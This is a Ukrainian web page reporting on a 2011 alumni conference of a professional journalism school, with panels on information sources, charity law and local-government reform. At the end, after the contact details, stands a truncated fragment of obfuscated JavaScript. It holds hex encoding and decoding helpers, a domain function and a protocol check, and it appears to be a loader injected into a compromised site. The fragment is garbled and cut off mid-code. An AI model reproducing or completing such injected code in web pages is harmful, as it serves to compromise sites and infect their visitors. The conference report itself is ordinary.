КОНФЕРЕНЦІЯ ВИПУСКНИКІВ ШКОЛИ ПРОФЕСІЙНОЇ ЖУРНАЛІСТИКИ «НОВА УКРАЇНА» (2011)

10-11 грудня 2011 року відбулася Конференція Школи професійної журналістики «НОВА УКРАЇНА». Захід було проведено Лабораторією законодавчих ініціатив у партнерстві ізУкраїнським незалежним центром політичних досліджень та за підтримки Ради Європи йМіжнародного фонду «Відродження». Конференція зібрала випускників 2009-2010 років Школи та цьогорічних учасників, яким було вручено дипломи. Захід був присвячений темам пошуку та використання джерел інформації в роботі журналіста,  висвітленню благодійництва в ЗМІ, а також проблемі адміністративно–територіальної реформи в Україні.10 грудня Конференція розпочалася з вітального слова Вікторії СЮМАР, виконавчого директора Інституту масової інформації, члена Правління  Міжнародного фонду «Відродження», члена Проектної ради Школи, та Ігоря КОГУТА, голови Ради Лабораторії законодавчих ініціатив, директора Школи професійної журналістики «НОВА УКРАЇНА».  Після цього розпочалася панельна дискусія на тему «Джерела інформації в роботі журналіста: проблеми пошуку та використання». У дискусії взяли участь Вікторія СЮМАР, Андрій КУЛИКОВ, журналіст, ведучий програми “Свобода слова”, член Проектної ради Школи, Ірина СОЛОМКО, оглядач журналу «Кореспондент» та Наталія СОКОЛЕНКО, спеціальна кореспондентка «Вікна-Новини» телеканалу СТБ.В.Сюмар у своєму виступі наголосила, що  завданням журналіста є відбір потрібної та корисної інформації серед різноманіття джерел, які продукуються у світі. Відповідаючи на репліки колег щодо зникнення традиційних ЗМІ та домінування у сучасному медіа просторі нових медіа, А.Куликовзазначив, що, на його думку, традиційні медіа все ж збережуть свої позиції, а також визначив радіо як найдемократичніший засіб масової інформації, де дискусія є найбільш можливою. Також А.Куликов наголосив на важливості дотримання професійних стандартів у професії журналіста; джерела інформації, на його думку, мають бути перевіреними, достовірними. Журналіст також підкреслив, що часто трапляється так, що інформаційні агентства, які в теорії мають надавати найактуальнішу інформацію, на практиці не завжди перевіряють її новизну. І.Соломко у своєму виступі підтримала А. Куликова і зазначила, що пересічна людина, що надає інформацію і у сучасному світі може вважатися журналістом, перш за все, не є професіоналом своєї справи. З огляду на те, що завданням журналіста є не лише передача інформації, а й її обробка та аналіз, то традиційні ЗМІ, де працюють професійні журналісти, не полишать арени медіа простору.  І. Соломконаголосила на важливості диверсифікації джерел інформації, що є особливо актуальним у політичній журналістиці. В свою чергу, Н.Соколенко розповіла про свій досвід роботи з джерелами інформації вже після того, як матеріал відзнятий.

Після цього робота Конференції продовжилася виступами Максима ЛАЦИБИ, керівника програм Українського незалежного центру політичних досліджень, та Олександра ВІННІКОВА, голови Правління Мережі розвитку європейського права, про стан розвитку благодійництва в Україні. М.Лациба зазначив, що станом на 2010 рік Україна посідала лише 150-те місце у світовому рейтингу благодійності серед 153 держав і, відповідно, останнє місце з 26 держав у регіоні Центральної та Східної Європи. Найчастіше українці дають милостиню на вулиці, допомагають бездомним дітям та роблять пожертви на церкву. О.Вінніков зосередився на основних недоліках існуючого законодавства про благодійність. Серед основних його слабких місць експерт назвав довгий строк, потрібний для  реєстрації благодійної організації чи фонду, необхідність узгодження отримувачів допомоги із місцевими органами влади, а також необхідність доплати за кожну одну гривню благодійної допомоги 5,52 гривень податку. Також,  О. Вінніков закликав журналістів підтримати законопроект «Про благодійництво та благодійні організації» (№ 6343 від 26.04.2010 р.), що вносить суттєві покращення в законодавче регулювання благодійництва в Україні.

Після цього Ольга ГЕРАСИМ’ЮК, генеральний продюсер ISTIL studios, тележурналіст, у своєму виступі зосередилася на питанні соціальної журналістики. О.Герасим’юкрозповіла про свій досвід роботи із соціально важливими темами, зазначивши, що наразі соціальна журналістика зникає, її місце починають займати новини кримінального характеру, і таким чином формують уявлення людей про світ та події в ньому.

Наступний день роботи Конференції було присвячено реформуванню системи місцевого самоврядування в Україні. Робота двох панельних дискусій розпочалася із вступного слова Наталії СТАРОСТЕНКО, менеджера програми Ради Європи «Посилення інституційної спроможності  місцевої влади в Україні», яка зазначила, що основною метою реформи місцевого самоврядування є посилення спроможності органів місцевого самоврядування виконувати нові завдання, які вони отримають в процесі децентралізації. Також Н.Старостенко розповіла учасникам про основні компоненти програми Ради Європи, спрямованої на підтримку сильної та ефективної системи місцевого самоврядування в Україні.

Після цього відбулася дискусійна платформа на тему «Проблеми та виклики адміністративно-територіальної реформи в Україні». Участь в обговоренні взяли Юрій ГАНУЩАК, народний депутат України, член Комітету Верховної Ради України з питань бюджету, Анатолій ТКАЧУК, директор Інституту громадянського суспільства, Павло КОЗИРЄВ, голова Асоціації малих міст України, віце-президент Асоціації міст України, Валентина ПОЛТАВЕЦЬ, заступник міського голови м. Українка. Ю.Ганущак у своєму виступі зосередився на концепціях реформ адміністративно-територіального устрою та місцевого самоврядування в Україні, зазначивши, що адміністративно-територіальна реформа є конче необхідною з огляду на прискорену депопуляцію сіл. Народний депут України також окреслив основи сучасного адміністративно-територіального устрою та принципи створення громад, розповів про правовий статус, повноваження та на прикладах показав нові способи розподілу адміністративно-територіальних одиниць. А. Ткачук зазначив, що, на його думку, органи місцевого самоврядування в Україні володіють достатніми повноваженнями та компетенцією для здійснення ефективного управління, але, на жаль, не мають достатнього бюджету. Виступ П.Козирєва був присвячений проблемам розподілу повноважень між центральними та місцевими органами влади, зазначивши, що йому, як представнику місцевої влади, часто не вистачає повноважень для ефективного вирішення місцевих проблем громадян (як-то велика кількість машин у дворі будівлі, несанкціонований ремонт квартири тощо). В.Полтавець поділилася своїм досвідом у сфері місцевого самоврядування, висловила сподівання, що адміністративно-територіальна реформа впорядкує і покращить життя мешканців громади. Заступник мера також звернула увагу на те, що перш за все в питаннях реформи потрібно орієнтуватися на людину і її потреби, та наголосила, що поганий менеджмент і тотальна неповага до всього – проблеми нашої країни, які не дають відбутися змінам.

Завершальним акордом Конференції випускників став виступ Наталії ДНІПРЕНКО, директора недержавної організації «Нові медіа» на тему «Роль ЗМІ у підвищенні обізнаності громадськості щодо реформ місцевого самоврядування». Експерт підкреслила особливу роль ЗМІ у донесенні інформації та формуванні реальності, а також відзначила, що «та подія, яка не висвітлена ЗМІ, вважається такою, що не відбулася». Н. Дніпренко розповіла про технології зворотного зв’язку з владою, зокрема про систему рад та громадську експертизу. По завершенню була представлена інтерактивна інформативно-аналітична система  «Громадянське суспільство і влада», яка спрямована на підтримку розвитку громадянського суспільства.

Дивись також:

Список учасників (pdf).

ПЕРША ЩОРІЧНА КОНФЕРЕНЦІЯ ВИПУСКНИКІВ ШКОЛИ ПРОФЕСІЙНОЇ ЖУРНАЛІСТИКИ «НОВА УКРАЇНА» (2010). 

За детальною інформацією про роботу Школи звертайтеся до координатора програми Наталії Матвієнко (natalya[at]laboratory.kiev.ua), програмного менеджера Школи професійної журналістики “НОВА УКРАЇНА” Марії Коваль (info[at]laboratory.kiev.ua) або асистента Школи Галини Тищенко (galyna[at]laboratory.kiev.ua) за тел.: 044 531 37 68, а також додаткову інформацію можна знайти на веб-сторінці Школи www.mediaschool.parlament.org.ua.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "parlament.org.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Залишити відповідь